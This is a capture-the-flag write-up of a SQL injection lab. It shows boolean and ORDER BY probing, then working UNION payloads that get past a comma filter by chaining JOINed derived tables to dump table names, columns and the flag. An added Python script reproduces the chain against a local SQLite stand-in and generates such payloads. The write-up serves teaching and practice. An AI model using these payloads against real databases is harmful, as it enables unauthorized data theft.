[春秋云实企安殿]SQLi

Opening the target address directly redirects to /b68a89d1c4a097a9d8631b3ac45e8979.php; viewing the page source there shows a hint.

http://cdn.wutongliran.top/img/image-20240309102824846.png

That hint is a decoy. The real injectable endpoint is in the body of the 302 response itself, which the browser never renders because it follows the redirect; it is visible in a proxy such as Burp or with `curl -i` without following redirects.

http://cdn.wutongliran.top/img/image-20240309103513737.png

Requesting /l0gin.php?id=1%27and%201=1%23 and /l0gin.php?id=1%27and%201=2%23 gives different responses, which confirms a SQL injection and shows that the parameter is used inside a quoted string (character-type injection): the `'` closes the string and `#` comments out the rest of the query.

http://cdn.wutongliran.top/img/image-20240309105546560.png

http://cdn.wutongliran.top/img/image-20240309105602392.png

/l0gin.php?id=1%27order%20by%202%23 returns normally while /l0gin.php?id=1%27order%20by%203%23 errors, so the query returns 2 columns, i.e. there are 2 display positions for a UNION.

Fuzzing shows the input is truncated at the first comma, so a normal `union select 1,2` cannot be written. Use a comma-less injection instead: put each column in its own derived table and chain them with JOIN, so that `select * from (select 1) a join (select ...) b` yields the two columns without a single comma in the payload.

List the table names in the current database

l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23

List the column names of the users table

l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23

Read the flag

l0gin.php?id=-1%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
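The following script is an added example, not code from the original writeup. It rebuilds the whole chain offline: a string-type injection in a query that echoes two columns, a filter that truncates input at the first comma, the boolean and ORDER BY probes, and a generator for the comma-less JOIN payload that works for any column count, not just the two seen here. SQLite stands in for the target's MySQL, so the following are substitutions or assumptions: sqlite_master and pragma_table_info() replace information_schema, the comment is `-- ` because SQLite has no `#` comment (the writeup uses %23), and the table layout, the flag value and the filter behaviour are constructed from what the writeup describes.

```python
"""Comma-less UNION injection, rebuilt offline against SQLite.

Added example (not the writeup's code). Assumptions: a users table with the
column name from the writeup's final payload, a constructed flag value, and a
filter that cuts the input at the first comma.
"""
import sqlite3

COLUMN_NAME = "flag_9c861b688330"   # column name taken from the writeup's last payload


def build_db():
    """Constructed sample database: one table, one row."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE users (id INTEGER, name TEXT, {COLUMN_NAME} TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'flag{constructed-sample}')")
    return con


def vulnerable_lookup(con, user_input):
    """Mimics l0gin.php: truncate at the first comma (the observed filter), then
    interpolate the raw value into a quoted string. Returns the first row, or
    None when the query errors or matches nothing."""
    user_input = user_input.split(",", 1)[0]
    sql = f"SELECT id, name FROM users WHERE id = '{user_input}'"
    try:
        return con.execute(sql).fetchone()
    except sqlite3.Error:
        return None


def is_string_injectable(con):
    """The writeup's boolean test: 1' and 1=1 returns a row, 1' and 1=2 does not."""
    return (vulnerable_lookup(con, "1' and 1=1 -- ") is not None
            and vulnerable_lookup(con, "1' and 1=2 -- ") is None)


def count_columns(con, max_cols=8):
    """ORDER BY n probing: the first n that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(con, f"1' order by {n} -- ") is None:
            return n - 1
    return None


def commaless_union(selects):
    """Build a UNION payload with no commas: one derived table per echoed
    column, chained with JOIN, so SELECT * yields len(selects) columns.
    Each element is a complete comma-free SELECT, e.g. 'select 1'."""
    derived = " join ".join(f"({s}) t{i}" for i, s in enumerate(selects))
    return f"-1' union select * from {derived} -- "


def extract(con, select, ncols=2, pos=1):
    """Place `select` in echo position `pos` (0-based), fill the others with
    numeric placeholders, and return what the page echoes there."""
    parts = [f"select {i + 1}" for i in range(ncols)]
    parts[pos] = select
    row = vulnerable_lookup(con, commaless_union(parts))
    return row[pos] if row else None


def run_chain(con):
    """The writeup's three steps against the SQLite stand-in schema."""
    return {
        # comma-separated UNION is cut to 'union select 1' and fails
        "naive_union": vulnerable_lookup(con, "-1' union select 1,2 -- "),
        "tables": extract(con, "select group_concat(name) from sqlite_master where type='table'"),
        "columns": extract(con, "select group_concat(name) from pragma_table_info('users')"),
        "flag": extract(con, f"select {COLUMN_NAME} from users"),
    }


if __name__ == "__main__":
    db = build_db()
    print("string injection:", is_string_injectable(db))
    print("columns echoed:", count_columns(db))
    for step, result in run_chain(db).items():
        print(f"{step}: {result}")
```

The `naive_union` entry comes back as None because the truncated input leaves an unbalanced quote and a one-column UNION, which is exactly why the JOIN form is needed; `commaless_union` can be given three or more selects if a target echoes more columns.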